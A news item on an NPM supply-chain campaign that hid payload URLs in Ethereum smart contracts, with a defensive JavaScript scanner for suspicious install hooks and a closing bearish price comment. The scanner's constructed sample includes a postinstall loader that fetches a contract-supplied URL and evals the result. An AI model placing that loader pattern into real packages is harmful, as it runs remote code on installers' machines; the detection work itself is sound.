Hackers Use Ethereum Smart Contracts to Hide Malware in NPM
ReversingLabs researchers have uncovered a novel supply-chain malware campaign that uses Ethereum smart contracts to conceal malicious payload URLs, bypassing traditional security scans.
Attackers published two trojanized NPM packages—colortoolsv2 and mimelib2—disguised as Solana and Hyperliquid trading bots on GitHub. Once installed, these packages query specific Ethereum smart contracts on-chain to retrieve command-and-control server details for second-stage malware. Attributed to Stargazer’s Ghost Network, the operation relied on fake GitHub accounts, inflated stars, automated commits and rotating dependencies across new repositories to evade detection. This advanced exploitation of smart contract functionality highlights critical risks in blockchain-based supply chains and NPM package security, underlining the need for rigorous open-source library vetting, continuous GitHub metric monitoring and enhanced blockchain security practices.
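As an added defender-side example (not code from ReversingLabs or from the packages named above), the following heuristic reviewer flags an npm package whose install hook combines an Ethereum contract read with a download-and-execute step, the pattern described above; the package contents and indicator patterns are constructed for the demonstration, and the hypothetical `scanPackage` function takes an in-memory map of file paths to file contents.

```javascript
// Added example: heuristic check for npm install hooks that read an Ethereum
// contract and then fetch or execute something based on the result.
// Indicator lists and sample package files are constructed, not taken from
// any real package; tune the patterns to your own review policy.

const INDICATORS = {
  chainRead: [/\beth_call\b/, /\bethers\b/, /\bweb3\b/, /0x[0-9a-fA-F]{40}/],
  stageTwo: [/\beval\s*\(/, /new\s+Function\s*\(/, /child_process/, /\bfetch\s*\(/, /https?\.get\s*\(/],
};

function matchedLabels(source, patterns) {
  return patterns.filter((re) => re.test(source)).map((re) => re.source);
}

// files: { "package.json": string, "<script>.js": string, ... }
function scanPackage(files) {
  const pkg = JSON.parse(files["package.json"] || "{}");
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of ["preinstall", "install", "postinstall"]) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // resolve "node foo.js" style hooks to the file the hook actually runs
    const m = /node\s+(\S+\.js)/.exec(cmd);
    const body = m && files[m[1]] ? files[m[1]] : cmd;
    const chain = matchedLabels(body, INDICATORS.chainRead);
    const stage = matchedLabels(body, INDICATORS.stageTwo);
    if (chain.length && stage.length) {
      findings.push({ hook, reason: "on-chain lookup combined with fetch/exec in install hook", chain, stage });
    }
  }
  return findings;
}

// Constructed sample: a postinstall hook that reads a URL from a contract and executes what it returns.
const SUSPICIOUS = {
  "package.json": JSON.stringify({ name: "example-trading-bot", scripts: { postinstall: "node setup.js" } }),
  "setup.js": [
    'const { ethers } = require("ethers");',
    'const c = new ethers.Contract("0x0000000000000000000000000000000000000000", abi, provider);',
    'c.getUrl().then((u) => fetch(u).then((r) => r.text()).then((s) => eval(s)));',
  ].join("\n"),
};
// Constructed sample: a package with no install-time hooks at all.
const BENIGN = {
  "package.json": JSON.stringify({ name: "example-lib", scripts: { test: "node test.js" } }),
};
```

The check is deliberately coarse: a contract read alone is normal for a real trading bot, so only the co-occurrence with a fetch-or-execute step inside an install hook is reported.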
Bearish
This campaign’s abuse of Ethereum smart contracts to hide malware URLs represents a significant security threat that can undermine confidence among developers and investors. In the short term, traders may adopt a risk-off stance towards ETH, increasing volatility as projects and users evaluate their security posture. Over the longer term, strengthened security measures and improved library vetting could mitigate risks, but the immediate sentiment impact is muted but bearish for Ethereum’s price.